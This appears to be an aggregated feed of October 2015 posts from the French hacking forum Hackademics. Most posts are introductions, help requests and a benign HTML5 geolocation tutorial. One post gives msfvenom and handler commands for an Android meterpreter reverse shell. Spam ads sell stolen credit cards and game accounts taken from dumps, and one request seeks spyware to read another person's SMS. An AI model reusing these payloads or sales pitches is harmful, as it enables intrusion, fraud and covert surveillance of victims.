samedi 31 octobre 2015

Documentaire Edward Snowden

Bonjour ou bonsoir à tous.

Je vous présente un documentaire à propos d'un homme remarquable Edward Snowden, vous avez sûrement entendu parler de lui.
Il travaillait pour la NSA mais il a divulgué des documents secrets concernant l'espionnage que fait le gouvernement américain.
Voilà vous pouvez regarder le documentaire ici :

https://www.youtube.com/results?sear...n+documentaire


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1NIQtWe
via IFTTT

mercredi 28 octobre 2015

Besoin d'aide - configuration payload WAN avec Proxy

Bonjour :D

Cela fait quelques jours déjà que je cherche solution à mon "problème" sans résultat. Je pense que la communauté de Hackademics sera m’aiguiller.
J'ai déjà configuré un payload pour android avec Metasploit qui fonctionne en LAN. Jusque-là pas de souci.
C'est quand je veux aller plus loin et tester sur le réseau WAN que se coince. Je vais essayer de vous expliquer comment je procède

Je suis sur kali Linux 2.0, à ma disposition j'ai mon Pc portable (l’attaquant), mon smartphone android (la victime). Je dispose également d'un proxy Pptp gratuit (histoire d'avoir un Ip static).

Pour creer mon payload je fais :
Code PHP:

msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip de mon proxyLPORT=443 R app.apk 

Ensuite je le récupère l'apk que j'installe sur le smartphone.

Reste plus qu'à récupérer le signal :
Code PHP:

msfconsole
~ use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST [ip du proxy]
set LPORT 443
exploit 

Et là j'obtiens :
Code PHP:

Handler failed to bind to xx.xxx.xxx.xxx:443
Started reverse handler on 0.0.0.0
:443
Starting the payload handler
... 

Selon moi le problème ne peut venir que de deux facteurs, l'ip et/ou le port. J'ai essayé sans le proxy (donc avec mon Ip internet), avec d'autres ports mais rien n'y fait.

Au final je pense que je peux résumer mon problème en une question : Comment configurer un payload en WAN avec un proxy Pptp ?

J’espère avoir été clair dans mes explications et avoir donné assez de détail. Si quelqu’un à la solution je lui en serai reconnaissant ;)

K4LIN00B


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1MU9Mcl
via IFTTT

mardi 27 octobre 2015

Series du moment

Ce petit thread pour vous partager mes series du moment en espérant vous faire découvrir quelques perles qui vous permettront de décompresser entre 500 lignes de code ;)

Archer

Archer est une série d'animations américaine, humoristique sur fond d'espionnage.
Perso, j'aime beaucoup. Y'a de l'action, c'est trash, drôle et bien écrit. Sans doute une de mes series préférées.

http://youtube.com/watch?v=bfQkIuMQBkc

Sherlock

Comme son nom l'indique Sherlock est une série sur le plus célèbre des détectives.
C'est une série britannique créée par Steven Moffat (cf. Dr Who)
L'intrigue se déroule au XXI siècle. Sherlock est donc un détective consultant pour la police de Londres et partage son appartement avec son non moins célèbre colocataire, assistant et ami John Watson, ancien médecin de l'armée britannique blessé en Afghanistan.

La série met un peu de temps à se lancer, mais une fois les premières enquêtes entamées je n'ai pu décrocher, cette série est vraiment captivante.
Le format est de 3-4 épisodes de 90 minutes par saison et la série contient 3 saisons. Une quatrième devrait arriver.

http://youtube.com/watch?v=eF3XvPZPjug


The blacklist

The blacklist est une série policière américaine.
L'intrigue de la série est vraiment prenante et Redington (le rôle principale) est vraiment badass dans son genre AMHA. Bon, une courte vidéo vaudra mieux qu'un long discours.

http://youtube.com/watch?v=CYCmiLej0z8


Pour finir je ne saurai trop vous conseiller de regarder Dr Who, @Samuel MM nous a déjà posté un petit truc à ce sujet ici ça peut paraître kitsch au premier abord, à vrai dire ça l'est certainement (dans un souci de cohérence avec la série de 1963 je pense), mais cette série est énorme.

Je ne vais pas m'amuser à disserter afin de vous convaincre, mais ces deux vidéos pourront peut-être répondrent à certaines questions quant à cette série.

http://youtube.com/watch?v=S8njnNPIx9g

http://youtube.com/watch?v=j0F7bPolMK0

Sur ce, je vous invite vous aussi à partager vos coups de coeur du moment.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1M0Rc5T
via IFTTT

lundi 26 octobre 2015

Présentation styxx

Bonjour a tous , =)

Pseudo: StyXx
Age: 19
Profession / Étude: Etudiant en maths info

Compétence en Réseaux: Débutant
Compétence en Web: Débutant
Compétence en Programmation: c

Autre Compétence: VFX/GFX (débute)


Comment avez vous connu le forum?
vidéo youtube


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Lxn8gI
via IFTTT

presentation et demande d aide svp

bjr

je suis debutante j ai 37 ans et je m interesse beaucoup a l informatique.

j aimerais de l aide svp


j ai une personne qui me harcele par messsage prive sur facebook avec de faux comptes pas de photo, avec des noms différents je ne peut pas acceder au profil ni repondre au message.

la police ne veut rien faire.

j aimerai avoir de l aide ou un coup de main , afin de savoir qui m envoi ses messages?

je ne sait pas ou poster ce message , aider moi svp

merci d avance


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1R8OUlj
via IFTTT

SELLING CV SHOP - CVHOUSE.WS !!! ICQ# 309576 Jabber : generalman@xmpp.jp

Hello all.
We glad to represent our service on best Ccs selling shop!!!
High valid rate!
Low price!
Visit now HIGH QUALITY SHOP : CVHOUSE.WS !!!

Our contacts:

ICQ# 309576
Jabber : generalman@xmpp.jp
Support: 624092235


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PNUfkq
via IFTTT

dimanche 25 octobre 2015

Besoin de conseils - Licence Pro Administration et Sécurité Systèmes et des Réseaux

Bonjour, je suis actuellement en recherche d'une poursuite d'études après avoir validé un DUT Métiers du Multimédia et de l'Internet.

Je suis tout particulièrement passionné par le réseau et sa sécurité, ainsi que par la formation du personnel face à l'Ingénierie Sociale.

Je souhaite poursuivre mes études en Licence Professionnelle, car j'ai plus de facilités à apprendre tout en pratiquant. Suite à mes recherches je suis tombé sur une Licence Pro "ADMINISTRATION ET SÉCURITÉ DES SYSTÈMES ET DES RÉSEAUX EN ALTERNANCE" :

http://ift.tt/1R6Vhp7

J'aurais aimé savoir si certains d'entre vous pouvaient me conseiller concernant cette formation.

Merci à vous !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1jIWGI0
via IFTTT

samedi 24 octobre 2015

[Changement de système d'exploitation] Mac OS vers Xubuntu

Bonjour à vous Hackadémiciens,

Je viens encore une fois vers vous en espérant que votre savoir pourra me rendre service.

J'ai un ami qui a hérité d'un ordinateur Mac Book Pro suite au décès tragique de son père. Personne ne possède le mot de passe de cet ordinateur qui était sa machine professionnelle. Aujourd'hui mon ami souhaite que je lui installe une distribution de Linux sur son ordinateur. Mon choix s'est porté sur la distribution Xubuntu (X11 + Ubuntu) que j'apprécie beaucoup.

Comme nous n'avons pas le mot de passe de l'utilisateur j'ai donc pensé comme pour un ordinateur lambda mais j'ai oublié un détail : Apple sont des P***** de casse c******. Une fois Xubuntu installé en ayant fait le choix de supprimer le contenu du disque dur Apple, quand j'allume l'ordinateur la pomme n'apparaît plus mais à la place une image avec une dossier sur lequel clignote un point d'interrogation. Et bien entendu Xubuntu ne se lance pas non plus.

J'espère que vous avez une solution soit pour réinstaller une version de Mac OS vierge soit pour arriver à booter sur Xubuntu.

Il est très très probable que je sois passé à coté de certains détails, je ne connais pas du tout Apple.

Merci à vous et bonne journée !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1WaORqk
via IFTTT

vendredi 23 octobre 2015

Présentation Foxinet54

Bonjour tout le monde .

Pseudo : Foxinet54
Connaissances informatiques générales : Un peu dans tout les domaines , dur de détaillé , touche à tout , mais plus systèmes et réseaux
Connaissances en hacking : Niveau intermédiaire utilisateur de Kali 2
Système d'exploitation principal : Fédora et kali
Je viens sur ce forum pour : Découvrir , apprendre et participé à des projets .
J'ai connu ce forum via : Internet
Informations supplémentaires (job, intérêts, autres...) :
Job : admin réseaux .
Intérets : sécurité informatique .
Autres : Sport

Voila un début de présentation : )

En vous remerciant


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1LJXRxO
via IFTTT

dimanche 18 octobre 2015

News La "Hack Academy" La nouvelle campagne de sensibilisation au Hacking.



Lancée officiellement le 1er Octobre 2015, la "Hack Ademy" n'est nul autre que le nom trouvé par le CIGREF et l'ANSSI pour leur nouvelle campagne de sensibilisation au Hacking. Le support utilisé est simple, une téléréalité dans laquelle des candidats vont passer devant un jury afin de présenter leur méthode. Chaque candidat a une spécialité et le but est de sensibiliser les gens et de leur apprendre les méthodes pour se protéger. Ainsi, on retrouve Dimitri, pour le paiement sécurisé, Jenny pour le vol de mots de passe, Martin pour les logiciels malveillants et Willy, pour le phishing. Le site vous propose pour chaque candidat une petite vidéo, dans laquelle il vous explique sa méthode, et un petit questionnaire pour voir si vous avez suivi. Je vous rassure, vous n'apprendrez pas grand chose en regardant ces vidéos. Mais dans votre entourage, la plupart des personnes sont inconscientes de ces risques !


http://ift.tt/1FOX3ux


Source : korben, cigref


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1QKG2Sw
via IFTTT

Faire transité des données entre 2 pages WEB

Bonjour,

Sur mon site WEB privé, je voudrais me connecter à divers site WEB en cliquant sur un lien.
C'est-à-dire, j'ai l'identifiant et le mot de passe dans ma base de donnée.
Lorsque que je clique sur mon lien, je me connecte automatiquement sur le site WEB sans rentrer aucun identifiant et mot de passe.
Si quelqu'un sais faire, je suis preneur !

Simarre


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1GNfuuh
via IFTTT

Présentation de Simarre (Moi)

Pseudo : Simarre
Connaissances informatiques générales : C++/Batch/HTML-CSS/PHP
Connaissances en hacking : Moyen
Système d'exploitation principal : Windows 7 x64
Je viens sur ce forum pour : Améliorer mes compétences dans le domaine du hacking
J'ai connu ce forum via : Navigateur (Mozilla Firefox)
Informations supplémentaires (job, intérêts, autres...) : Je suis un étudiant en Terminal S S.I, j'adore trouver des failles dans les sites et coder des scripts intéressants à la revente.

Voilà, plus d'info, me contacter :D


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1LDBvS2
via IFTTT

Présentation de TomHCK

Bonjour je m'appelle Tom j'ai 20 ans je suis débutant en hacking tout les jours on apprend j'aimerais travail dans sécurité web
Je c'est pénètre les site web je connais le coding crack des logiciel soie même ect ect et j'espère apprendre davantage avec vous cordialement


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1OMXarU
via IFTTT

jeudi 15 octobre 2015

sécurités de mon site internet

bonjour a tous.
Je développe un site un internet pour le moment et je voudrais bien savoir est ce que le site a des failles de sécurité ou non.
Si oui je voudrais bien savoir ce que je peut faire pour me protéger.
Lien du site http://bit.ly/1GeP9uo
Merci pour vos réponses en bonne journée.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PjisPc
via IFTTT

mardi 13 octobre 2015

Drive-By-Download : Vecteur d'infection malware

Bonjour :)

Je m'intéresse au vecteur d'infection "drive by download" de malware, qui consiste grosso modo à télécharger depuis un site malveillant un programme qui s’exécute tout seul, et ce manière transparente sans que l'utilisateur s'enn aperçoive.

Je trouve cette technique très étonnante : comment javascript qui est un langage de haut niveau script peut-il, depuis un navigateur, interagir avec l'OS du client ?

De plus, à titre informatif toujours, je me demande quelles sont les techniques employées pour la phase de téléchargement & exécution.


J'ai déjà trouvé un papier fort intéressant plus ou moins sur le sujet, mais qui semble ne concerner que l'appel du code malveillant dans le site. C'est à dire l'incorporation du code malveillant dans une <iframe> afin d'esquiver les detections du navigateur.


Avez vous de la doc sur le sujet ?

Est-ce réalisé avec des fonctions basiques sans protection inhérentes à Javascript (download()...), ou bien avec des techniques type buffer-overflow, dépendant alors du navigateur et de sa version ?

Sauf erreur, je n'ai pas trouvé de topic similaire sur le site. En espérant que ça en intéresse plus d'un.

Merci :)

[EDIT] : en fait je viens de trouver un topic de stakanov, mais avec une techniques bien différente.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Zyh2UC
via IFTTT

lundi 12 octobre 2015

Tutoriel Quand La technologie se met trop au service de la géolocalisation

Quand La technologie se met trop au service de la géolocalisation



Loin des cookies qui sont et reste une infection majeure de nos appareils technologiques au profit des gosses entreprises de marketing, la géolocalisation n'en demeure pas moins également le fléau du 21e siècle.



Qui aurait cru en entamant le web 3.0 qu'HTML5 et PHP6 renforcerait son pouvoir sur nous ?



On n'est pas dans les clichés d'homme arborant des chapeaux d'aluminium sur la tête, qui tout en parcourant la rue crie au complot de l'état. Pourtant, ils ont raison ou du moins loin d'avoir tort.



Vous savez ce qui m'attriste dans tout cela, c'est que la technique utilisé pour persuader la masse est d'accentuer l'aspect risible de cette situation pour en détourner sa vraie valeur : On est géolocalisé tout le temps, partout grâce aux mobiles, pc, plate-forme web, google,…



Citation:

Dites moi d'où je viens et je te dirais qui tu es.


La géolocalisation est devenue un art de vivre, on l'a accepté comme un compagnon indispensable. Pourtant, on crié sur ces fous qui prétendaient que l'on pouvait nous localiser au mètre près, il y a de cela quelques années à peine. Ils ont réussi à nous mentir durant des années, et maintenant qu'ils ont besoin de nous dire la vérité, ils nous font gober qu'il s'agit d'un bien pour la communauté internet mais plus encore pour l'humanité.



Citation:

Le bien du plus fort, l'emporte sur le bien du plus faible.


Alors, qu'est-ce qui a changé ?



L'utilité. Tout ce qui nous est utile, on lui indiffère ses défauts et ses imperfections qui pourraient entraver notre besoin. Précédemment, on le savait, mais on nous avait conditionnés et crier au loup faisait de nous des êtres bizarres, donc pas vraiment cool et "sociability correct". Maintenant, ce n'est pas grave puisqu'on accepte la vérité avec panache et surtout déférence.


Citation:

Windows 10 nous écoute, nous localise, peu importe c'est pour notre bien. Mon mobile permet une fois la géolocalisation acceptée de savoir où je suis n'importe quand, peu importe cela permet avec mes amis cookies d'avoir des coupons réductions pour les fast-foods Asia près de chez moi.


Mais qui sont ces nouveaux fous qui nous exhortent que non seulement on nous géolocalise facilement mais en plus on n'interagit discrètement sur notre comportement.



Citation:

Je suis lucide, je mange asiatique, car cela me conviens.


Et non pas parce que depuis 1 mois j'ai accepté la géolocalisation et qu'avec les cookies qui ont fait part de mes envies, horaires et divers autres petits secrets sur ma vie, ont permis à des sociétés de marketing de profiter de la situation en vendant mon âme aux entreprises Asia.



Depuis, elle m'envoie des rappels aux heures des repas, des coupons de réduction pour moi et mes amies (eux aussi géolocaliser). Depuis peu, je reçois aussi des courriels d'un centre de yoga, j'en avais besoin, on m'en avait parlé sur le site zenhobbies, et il s'avère que par chez moi il y aurait un centre.



Je promets que je n'ai pas changé mes habitudes à cause d'un tiers, non, ce serait contraire à l'éthique internet d'avouer cela. Pourtant, j'ai bien changé, ma mère qui n'utilise pas vraiment de réseau géolocalisé m'a confié qu'elle me voyait moins aux heures des repas. Elle qui adorait me préparer ses fameuses tagliatelles au fromage, et mes collègues avec qui j'allais au football ont heureusement compris mon indisponibilité à cause de mes cours de yoga.



Citation:

La géolocalisation est la capacité à se positionner géographiquement sur un plan ou une carte.


Conscient que cela vous intéresse, nous allons voir ensemble sa configuration simple, son principe de base et son application pratique au moyen d'HTML5 et JavaScript.



Cet article est pour vous faire comprendre la facilité de connaître grâce au réseau votre situation géographique. Cela peut paraître redondant, mais savoir où vous vous trouvez peut avoir des conséquences catastrophiques suivant les individus.



Il y a de cela plusieurs années, des cambrioleurs sévissaient sur des personnes riches en géolocalisant leurs mobiles, ils pouvaient ainsi agir en toute impunité sans être dérangé afin de dévaliser leurs demeures.



Citation:

Le réseau n'est pas qu'un repaire de pirates informatiques mais aussi de malfrats.


La méthode



Plusieurs applications utilisent la méthode de positionnement comme les recherches conceptualisées, les calculs d'itinéraires, les partages de localisations,…, ils sont basés sur des méthodes existantes :



  • GPS (la plus connu)
  • Galileo
  • Triangulation dans un réseau de téléphonie
  • Adresse IP





Un navigateur web peut combiner plusieurs de ces méthodes suivantes si elles sont connectées sur le réseau d'internet.

Par exemple, une plate-forme mobile équipée d'un GPS, le navigateur pourra utiliser le positionnement géographique, mais sur un poste fixe qui n'en est pas équipé devra alors se baser sur l'IP.




Principe



Vous avez tous déjà fait de la géographie à l'école et certainement eut à lire ou à étudier des cartes. Une position 3D se fonde sur les coordonnées relatives à la latitude, longitude et altitude.



Le point de convergence de ces 3 points reliés entre eux permet d'avoir la position exacte dans un espace tridimensionnel de la cible.




Souvent, sur un site qui demande ce genre de géolocalisation, vous avez une demande d'autorisation.

L'api a la capacité de n'effectuer qu'une seule requête de positionnement ou répété dans le cas d'un déplacement sur la carte. Il faut aussi savoir que le positionnement peut être erroné (aléas des connexions) ou fausser (VPN, Proxy,…).


Coder un Géopositionnement





W3C API : http://ift.tt/19W7FqO





Citation:

Lorsqu'il s'agit de créer une application de géolocalisation, on va surtout utiliser Javascript et DOM. Pour le codage on va faire appel à l'objet "geolocation", membre de "navigator".


L'instruction est simple avec if, else :



Code:

If (navigator.geolocation) {

// API

} else {

// si PAS d'API, Alternative

}




Simple cependant, pour réaliser cette fonction, il nous faut des méthodes :



  • getCurrentPosition() // permet la requête de positionnement
  • watchPosition() // Pour suivre les déplacements de position







W3C nous montre un exemple de fonction :





Code:

  function showMap(position) {

    // Montrer une carte centrée au (position.coords.latitude, position.coords.longitude).

  }

    // une seule requête de demande de position.

  navigator.geolocation.getCurrentPosition(showMap);





On voit qu'on utilise ce que l'on appelle une fonction de "callback" comme argument. En fait, il appelle deux "callback" :


  • une pour le succès de manière asynchrone, celle-ci reste obligatoire
  • une en cas d'échec (falcutative)





Citation:

Les algorithmes et ceux peu importe leur dépendance et langages informatiques doivent toujours comporter lors d'une fonction la possibilité "ÉCHAP". Si cela ne marche pas, le système demandera, je fais quoi ? Sans réponse de notre part, il se mettra en "ERROR".



C'est à nous de lui dire quoi faire dans toutes situations. Le codage reste simple mais plus vous entrer dans la composition d'un codage adapté avec toutes les réponses que souhaite la machine, vous vous rendrez compte qu'il s'allonge et devient complexe.





De même un exemple lors de requêtes répétées pour un déplacement sur la carte avec watchPosition
:





Code:

function scrollMap(position) {   

// Défiler la carte de façon à ce qu'il soit centré au (position.coords.latitude, position.coords.longitude). 



 // Demande répétée des mises à jour. 

var watchId = navigator.geolocation.watchPosition(scrollMap);   

function buttonClickHandler()

{   

// Annuler les mises à jour lorsque l'utilisateur clique sur un bouton.    navigator.geolocation.clearWatch(watchId); 

}





D'autres exemples sont en place sur le site W3C. Donc, pour localiser il nous faut travailler avec la position et les coordonnées, voici un tableau des propriétés :


Propriété Unité Type
Timestamp Millisecondes DomTimeStamp
coords Millisecondes Coordinates
longitude Degré décimaux double
latitude Degré décimaux double
Altitude mètres double
Speed Mètre/seconde double







Citation:

Lorsque l'on voit la facilité pour utiliser la géolocalisation, on se demande encore comment se cacher avec la technologie.


On va faire un petit exemple simple avec juste votre navigateur. Copier/coller le code dans un fichier puis donner lui comme extension HTML (exemple; geo.html) et lancer le dans votre navigateur, une fois fait accepter la géolocalisation et visualisez le résultat.



<
Code:

!DOCTYPE html>

<html>

  <head>

      <!-- En-tête de la page -->

      <meta charset="utf-8" />

      <title>Géolocalisation</title>

<script>

// Fonction d'appel

function succesGeo(position) {

  var infopos = "Position déterminée : <br/>";

  infopos += "Latitude : "+position.coords.latitude+"</br>";

  infopos += "Longitude : "+position.coords.longitude+"</br>";

  infopos += "Altitude : "+position.coords.altitude+"</br>";

  document.getElementById("maposition").innerHTML = infopos;

}

// demande la position

navigator.geolocation.getCurrentPosition(succesGeo);

</script>

  </head>

  <body>

      <!-- Corps de la page -->

<div id="maposition"></div>

  </body>

</html>





En effet, c'est bluffant, on a nos coordonnées avec un script plutôt simplissime. Beaucoup d'API permette en prime d'afficher le résultat sur une carte.



L'API la plus connu et utilisé est Google Maps.



Voici la liste des API Map, suivi d'un code qui intègre Google simplement :



Google Maps

http://ift.tt/wbHatA



Bing Maps

http://ift.tt/RvEeOF



OpenLayers

http://openlayers.org/



Nokia Maps

http://ift.tt/1RCeqA2



Amazon Maps API

http://ift.tt/1a3ggWW





De même, on va faire un exemple pour nous situer cette fois-ci au sein d'une carte appelée par google maps (API), copier/coller le code suivant dans un fichier geomap.html et lancé via votre navigateur.



Code mettant en pratique l'API de google dans votre navigateur :



Code:

<!DOCTYPE html>

<html>

  <head>

      <!-- En-tête de la page -->

      <meta charset="utf-8" />

      <title>Géolocalisation avec API Google Maps</title>

                  <!-- Chargement de l'API Google Maps -->

                  <script src="http://ift.tt/PV0u3s;

<script>

if(navigator.geolocation){

// Fonction d'appel

function succesGeo(position) {

  var infopos = "Position déterminée : <br/>";

  infopos += "Latitude : "+position.coords.latitude+"</br>";

  infopos += "Longitude : "+position.coords.longitude+"</br>";

  document.getElementById("maposition").innerHTML = infopos;     

        // Nouvel objet LatLng pour google map

        var latlng = new google.maps.LatLng(position.coords.latitude,position.coords.longitude);     

        // Options sur la carte

        var optionsGmaps = {

        mapTypeControl: false,

        center: latlng,

        navigationControlOptions: {style: google.maps.NavigationControlStyle.SMALL},mapTypeId: google.maps.MapTypeId.ROADMAP,

        zoom: 15

        };     

        // Initialisation de la carte

        var map = new google.maps.Map(document.getElementById("map"), optionsGmaps);     

        // Marqueur de position

        var marker = new google.maps.Marker({

        position : latlng,

        map: map,

        title : "Vous êtes ici"

        });     

}

// Requête de géolocalisation

navigator.geolocation.getCurrentPosition(succesGeo);

}

</script>

  </head>

  <body>

      <!-- Corps de la page -->

<div id="maposition"></div>

<div id="map" style="width:640px;height:480px"></div>

  </body>

</html>





Résultat escompté : (J'ai bien entendu brouiller les coordonnées)

Vous pouvez l'agrandir en jouant sur widht et height dans le bloc Div de "map".



Comme vous le constater, votre navigateur vous demande encore l'autorisation de partager votre géolocalisation et ceux grâce à par exemple pour mozilla :



  • geo.enabled (activation, désactivation position partagé).
  • geo.wifi.uri (qui indique l'adresse intérrogé avec IP/WIFI).







Simple comme bonjour mais terriblement efficace.



On vient de voir que le positionnement géographique n'est certes pas encore au point au millimètre près, qu'il est tributaire de nombreux facteurs comme avoir un appareil technologique branché sous réseau et géolocaliser, mais à notre époque peu ne possède pas cette technologie.



Citation:

Avec l'avènement du web2.0 et du 3.0, l'arrivée de l'intelligence artificielle, des puces sous-cutanées et surtout de la mise sous réseau de notre vie (véhicule, frigo, chauffage,….), nous serons localisables à tout moment et surtout à tout endroit.


Les programmes que je vous ai montrés sont basiques mais pourtant efficaces. La plupart des applications sont sous API Geo afin soi-disant d'améliorer votre expérience, je pense que de ne plus avoir d'intimité sur la planète reste le vrai problème.



Citation:

L'avenir nous dira si cette masse de technologie aura apporté un plus ou un mal au sein de nos vies.


Merci de m'avoir lu, à bientôt.



Source : W3C, mes connaissances en HTML et JavaScript. Les scripts étant déjà pratiquement donnés par les sites émetteurs le reste n'est que du bon sens.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1ZuEcet
via IFTTT

dimanche 11 octobre 2015

Projet "d'apprentissage"

Bonjour,

J'ai une demande un peu particulière, j'aimerai créer un site web ou quelque chose d'autre pour vraiment me perfectionner dans la programmation. Mais je ne sais pas quoi créer pour regrouper plusieurs langage informatique, c'est pour sa que je suis la, je sais que c'est un peu vague mais j'aimerai concevoir quelque chose avec plusieurs langages.

J'aimerai créer sa avec comme langage :
Html/css
Php/mysql
Python
c/++

Auriez-vous une idée pour moi ?

Merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1jXn7JQ
via IFTTT

Problème durant l'installation d'Ubuntu

Bonjour à tous,

J'ai un problème pour installer ubuntu, je le lance via clé usb non persistant. Je le lance aucun problème, durant l'installation il me dit qu'il ne détecte pas mon système d'exploitation, donc je dois faire les partitions en manuelle. C'est la que le problème viens, je ne peut pas crée d'autre partition, les partitions windows sont en NTFS et pour linux je dois crée une partition en "swap" si je me souviens bien mais impossible de la crée..
J'ai regardé beaucoup de forum pour avoir de l'aide mais je n'arrive vraiment pas à résoudre mon problème. Je sais que sa manque d'info si vous avez besoin de plus d'infos je vous donnerai se qu'il vous faut.

Merci..


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1MppiB8
via IFTTT

samedi 10 octobre 2015

[PROJET]- Magasin de compte de jeux

Bonjour je suis nouveau dans ce site et même sur touts le net français, donc si ce que je fait la et interdit merci de me le dire.

Voila je suis un membre de la Team: [CMHT] Malice Team. c'est un petits groupe de hackeur russe pas très connues voire pas du touts (on fait touts pour ne pas faire parlés de nous). Donc voila, touts d'abord je vais vous parlés de hackeur russe et du net russe.

Contrairement au net français sur le net russe il y a beaucoup plus de hackeur et de forum pour les hackeur. dans ma petite Team je fait partie des Brutteur/Checkeur/DDosseur/Dumppeur. et mon projet je vais vous le présentai. Donc touts d'abord il consiste de vendre des compte de jeux a prix cassé. m'ait comme vous vous douté il sont bien sure sortie de DUMMP. je ne vais pas expliqué ce que c'est les Dummp et comment en faire. je veut montés un petits projet avec des perssone serieuse qui consisterai a vendre ces mêmes compte sortie de ces DUMMP. par exemple des compte Origine. il y a 2 sorte de compte sur Origine ceux avec la clef et ceux sans. ceux qui on pas la clef peuvent étre récupéré a touts moment par leur propriétaire. ceux qui l'on ne seront jamais restitué ou repris par le propriétaire.

C'est a dire, si vous acheter un compte BF4 sans clef vous pourrait y jouai 1h-2h, 1j-2j ou même toujours (sa dépend vraiment du compte), m'ait si vous acheter un compte BF4 Avec la clef ce sera la même chose que si vous l'avez acheter chez origine même car ce compte vous appartiendra pour toujours.

Donc voici un ceux que j'avais pensais. ( petite exemple )

Bonjour je suis un membre de la [CMHT] Malice Team ( un groupe de hacker russe peut connue )

Donc voila je vent plusieurs compte BF4 , BF3 , TITAN , touts les jeux son sur plateforme Origine.

Sur certain compte j'ai la le mots secret sur d'autre je ne l'ai pas. voici les prix.

BF4 Sans clef secret: 1.50€ Paypal
BF4 Premium Sans clef secret: 1.80€ Paypal
BF3 Sans clef secret: 1.00€ Paypal
BF3 Premium Sans clef secret: 1.50€ Paypal
TITAN sans clef secret: 1.50€ Paypal
---------------------------------------------------------

BF4 Avec clef secret (+Garantie que on ne vous le volera jamais): 4€ Paypal
BF3 Avec clef secret (+Garantie que on ne vous le volera jamais): 3€ Paypal
TITAN Avec clef secret (+Garantie que on ne vous le volera jamais): 4€ Paypal

----------------------------------------------------------

BF4 Premium Avec clef secret (+Garantie que on ne vous le volera jamais): 9€ Paypal
BF3 Premium Avec clef secret (+Garantie que on ne vous le volera jamais): 6€ Paypal

Je peut passer un test avec un modo pour montres ma collection de compte.

Vous pouvais me contacte par skype: kumik0544


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1K0rJDU
via IFTTT

vendredi 9 octobre 2015

une nouvelle

Bonjour

je m'appelle Pooum et je cherche à progresser dans cet univers du Hacking
je parcours le forum actuellement pour en comprendre le fonctionnement et j'espère pouvoir participer rapidement
merci pour l'accueil


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1MjnWIb
via IFTTT

espionner un portable

Bonjour la communauté :D
je ne sais pas si c'est possible de m'aider
j’essaie d'installer un logiciel espion sur un téléphone portable à distance pour récuperer des sms
j'ai essayé avec certains logiciels que j'ai trouvé sur internet mais à chaque fois ça n'a pas fonctionné car on me demande de payer un abonnement pour une lampe torche ou autre bêtise
Quelqu'un pourrais m'apprendre
merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1MjnUQi
via IFTTT

mardi 6 octobre 2015

Web Scraping is Beautiful




Le webScraping est le "grattage Web (où Web récolte donnée Internet de l'extraction) est une technique de logiciel informatique de l'extraction d'informations à partir de sites web".

Lorsque nous cherchons un bug, identifier sur un système une partie qui ne sera pas conforme au bon fonctionnement des logiciels qui tourne dessus, nous est amenée à récolter et à analyser des données.L'HTML analysé est facile en Python, en particulier avec l'aide de la bibliothèque Beautiful Soup.

On a beaucoup d'autres librairies possibles pour ce type de pratique. J'ai voulu partager ce programme qui n'est pas optimisé au maximum de ses capacités, attention, je ne traite pas encore de tout. Je partagerai bientôt d'autres programmes travaillés en C++ et python voire même Perl qui nous permettra de travailler sur les couches réseaux.Mais chaque chose en son temps. Vous avez sur Hackdemics des tutoriels conséquents sur le sujet, ainsi que ceux que j'ai partagés dernièrement sur SSL/TLS et SMTP.

Modules à installer, Dépendances :
tldextract
Beautiful Soup 4
Requests


Python V3.4

Je sais que Fred sera réticent, c'est normal, chacun a leurs préférences, personnellement j'utilise le module sur le moment. Mais Beautiful a cette chance d'avoir depuis 2004 été de sauver par les programmeurs.
Beautiful Soup se trouve au sommet des analyseurs Python comme lxml et html5lib, vous permettant d'essayer différentes stratégies d'analyse. On apprécie sa flexibilité et surtout sa librairie présentant de nombreuses fonctions facilement utilisables.


